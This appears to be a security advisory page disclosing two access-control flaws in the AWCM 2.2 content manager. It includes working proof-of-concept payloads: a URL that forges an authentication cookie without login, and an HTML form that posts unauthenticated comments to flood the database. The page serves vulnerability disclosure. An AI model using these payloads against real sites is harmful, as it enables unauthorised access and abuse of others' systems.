AWCM 2.2 Access Bypass

2012.11.09
Credit: Sooel Son
Risk: High
Local: No
Remote: Yes
CWE: N/A

Vulnerability Report AWCM 2.2 CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438 Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts DB records. Author: Sooel Son [sonpostman (at) gmail (dot) com] Source Code: http://sourceforge.net/projects/awcm/ 1. Details: CVE-2012-2437 Without going through an authentication procedure, anyone can forge a cookie, the pairs of key and value. Proof of Concept Code: Initiate the following URL request. http://targethost/awcm/cookie_gen.php?name=\'key\'&content=\'value\' ex) http://targethost/awcm/cookie_gen.php? name=awcm_member&content=123456 2. Details CVE-2012-2438 There is no access control protection for adversaries to insert millions of comment records on the database on show_video.php and topic.php. Proof of Concept Code: [form action=\"http://targethost/awcm/show_video.php?coment=exploit\" method=\"post\"] [input type=\"hidden\" name=\"coment\" value=\'insert uninvited comments 2\' /] [input type=\"submit\" value=\"Submit\"] </form> ########################## Vendor Notification * Nov 5th: Acknowledge the vendors, but no responses.

References:

http://sourceforge.net/projects/awcm/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top